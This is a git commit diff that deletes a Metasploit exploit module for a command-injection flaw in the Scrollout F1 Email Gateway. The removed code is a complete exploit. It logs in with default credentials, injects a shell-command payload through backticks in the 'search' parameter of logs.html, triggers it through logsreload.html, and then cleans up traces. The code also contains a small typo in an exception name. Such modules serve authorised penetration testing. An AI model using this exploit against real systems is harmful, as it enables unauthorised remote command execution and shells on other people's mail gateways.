Remove scrollout_loadlogs_exec for @bcoles

2017-04-21 21:23:42 -05:00 · 2017-04-21 21:23:42 -05:00 · ba0ead6915
parent 6412c66848
commit ba0ead6915
1 changed files with 0 additions and 156 deletions
--- a/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb
+++ b/unstable-modules/exploits/incomplete/unix/scrollout_loadlogs_exec.rb
@ -1,156 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::Remote::HttpClient
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => 'Scrollout F1 Email Gateway loadLogs Command Execution',
-      'Description'    => %q{
-        This module exploits a command execution vulnerability in Scrollout F1
-        version 2012-10-03 which could be abused to allow authenticated users to
-        execute arbitrary commands under the context of the 'www-data' user.
-        The 'loadLogs' function in the 'logsreload.php' file calls 'shell_exec()'
-        with user controlled data from the 'search' parameter.
-      },
-      'References'     =>
-        [
-          ['URL', 'http://itsecuritysolutions.org/2013-01-29-Scrollout-arbitrary-command-execution-vulnerability'],
-        ],
-      'Author'         =>
-        [
-          'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
-        ],
-      'License'        => MSF_LICENSE,
-      'Privileged'     => true,
-      'Arch'           => ARCH_CMD,
-      'Platform'       => 'unix',
-      'Payload'        =>
-        {
-          'BadChars'    => "\x00",
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'python perl bash netcat-e',
-            },
-        },
-      'Targets'        =>
-        [
-          ['Automatic Targeting', { 'auto' => true }]
-        ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => "Jan 29 2013",
-    ))
-
-    register_options([
-      OptBool.new('SSL', [true, 'Use SSL', false]),
-      OptString.new('BasicAuthUser', [true, 'The Scrollout username', 'Admin']),
-      OptString.new('BasicAuthPass', [true, 'The Scrollout password', '123456']),
-      OptString.new('TARGETURI', [true, 'The path to the web application', '/']),
-    ], self.class)
-  end
-
-  def check
-
-    peer    = "#{rhost}:#{rport}"
-    base    = target_uri.path
-    base    << '/' if base[-1, 1] != '/'
-    user    = datastore['BasicAuthUser']
-
-    # send check
-    print_status("#{peer} - Authenticating as user '#{user}'")
-    begin
-      res = send_request_cgi({
-        'method' => 'GET',
-        'uri'    => "#{base}",
-      })
-      if res and res.code == 401
-        print_error("#{peer} - Authentication failed")
-        return Exploit::CheckCode::Unknown
-      elsif res and res.code == 200 and res.body =~ /<title>Scrollout F1<\/title>/
-        return Exploit::CheckCode::Detected
-      end
-      return Exploit::CheckCode::Safe
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp
-      print_error("#{peer} - Connection failed")
-    end
-    return Exploit::CheckCode::Unknown
-
-  end
-
-  def exploit
-
-    @peer    = "#{rhost}:#{rport}"
-    base     = target_uri.path
-    base    << '/' if base[-1, 1] != '/'
-    command  = Rex::Text.uri_encode(payload.encoded)
-
-    # send payload
-    print_status("#{@peer} - Sending payload (#{command.length} bytes)")
-    begin
-      res = send_request_cgi({
-        'method'    => 'POST',
-        'uri'       => "#{base}logs.html",
-        'data'      => "search=`#{command}`",
-      })
-      if res and res.code == 200
-        print_good("#{@peer} - Payload sent successfully")
-      elsif res and res.code == 401
-        fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
-      else
-        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed")
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
-    end
-
-    # send payload trigger
-    print_status("#{@peer} - Sending payload trigger")
-    begin
-      res = send_request_cgi({
-        'method'    => 'GET',
-        'uri'       => "#{base}logsreload.html",
-      })
-      if res and res.code == 200
-        print_good("#{@peer} - Payload trigger sent successfully")
-      elsif res and res.code == 401
-        fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
-      else
-        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Triggering payload failed")
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
-    end
-
-    # cleanup
-    print_status("#{@peer} - Cleaning up config file (filter.cfg)")
-    begin
-      res = send_request_cgi({
-        'method'    => 'POST',
-        'uri'       => "#{base}logs.html",
-        'data'      => "search=",
-      })
-      if res and res.code == 200
-        print_good("#{@peer} - Cleaning completed successfully")
-      elsif res and res.code == 401
-        fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed")
-      else
-        fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Cleaning failed")
-      end
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed")
-    end
-
-  end
-
-end
-